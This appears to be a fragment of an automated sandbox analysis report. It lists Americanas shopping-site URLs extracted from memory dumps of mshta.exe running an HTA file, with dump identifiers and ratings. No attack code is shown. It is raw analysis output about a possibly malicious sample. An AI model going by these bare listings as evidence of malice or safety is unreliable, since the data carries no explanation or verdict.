                                                                                                                                                              https://www.americanas.com.br/#primaryimagemshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770661764.00000000092B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.americanas.com.br/categoria/beleza-e-perfumaria/cabelos?chave=dk_hm_at_cabelosmeta.largemshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=dk_hm_at_telefoniamshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                    high
                                                                                                                                                                    https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_mob-f565c14907fb.pngmshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.americanas.com.br/categoria/eletroportateis?chave=dk_hm_at_eletroportateismshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771021484.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.000000000929B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665417353.000000000C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747475403.000000000C12A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751601665.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://images-americanas.b2w.io/spacey/acom/2024/12/03/3-home-destaque_desk-cc5a6ad015ea.png&mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://nossaslojas.americanas.com.br/?chave=dk_ft_lojasmshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743405229.000000000C28F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777055490.000000000C295000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776004246.000000000C0AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745557399.000000000C293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2713571137.0000000009A8E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747772805.000000000C293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C288000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655631658.000000000C288000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://www.americanas.com.br/categoria/utilidadesgemshta.exe, 00000000.00000003.2651095257.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748463269.0000000009405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728196280.0000000009404000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669377685.0000000009401000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.americanas.com.br/categoria/relogios-e-joias/relogios?chave=pfm_home_relogios_menuSmshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://images-americanas.b2w.io/spacey/acom/2023/04/27/Samsung-1P-Abril-Contrato-RJ_americanas-homemshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658796254.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2713051987.0000000009A82000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770582217.00000000092B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748309575.0000000003385000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705594806.0000000009A81000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://images-americanas.b2w.io/spacey/acom/2023/09/29/DESK_APP-ATL-SERVICO-OFERTA_DIA-c06a4ab4555amshta.exe, 00000000.00000003.2670798916.0000000006ED4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726812852.0000000009360000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774395490.000000000A904000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748034689.000000000A901000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717207102.0000000009A5F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751923492.0000000006ED6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770661764.00000000092B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2677175292.000000000935B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695409967.0000000009A5D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.americanas.com.br/categoria/gift-cardmshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534101134.0000000006560000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.americanas.com.br/lojista/americanas-33014556000196/c/brinquedos?origem=blancalojista&chmshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668679539.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664288455.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.00000000093CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.americanas.com.br/categoria/games?chave=pfm_home_games_menumshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727259266.0000000006EF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://images-americanas.b2w.io/spacey/acom/2024/12/06/1-home-destaque_desk-6116be1e9cac.pngYmshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://www.americanas.com.br/produto/7510984342?chave=dk_hm_bn_4_5_oferta-ledmshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://www.americanas.com.br/busca/fantasia-papai-noelxmshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744785707.000000000A9F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.americanas.com.br/categoria/tvmshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670350202.000000000A856000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009332000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776701810.000000000C12C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009333000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665417353.000000000C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747475403.000000000C12A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://www.americanas.com.br/categoria/celulares-e-smartphones/acessorios-para-celular?chave=pfm_hmmshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://www.americanas.com.br/categoria/informatica-e-acessorios?chave=pfm_home_infoacess_menumshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=pfm_hm_tt_1_0_ar-condicimshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2713852346.000000000960B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664288455.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727644987.00000000093AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717336889.000000000960C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://www.americanas.com.br/produto/5008766730?chave=dk_hm_bn_4_2_oferta-esportemshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                          high
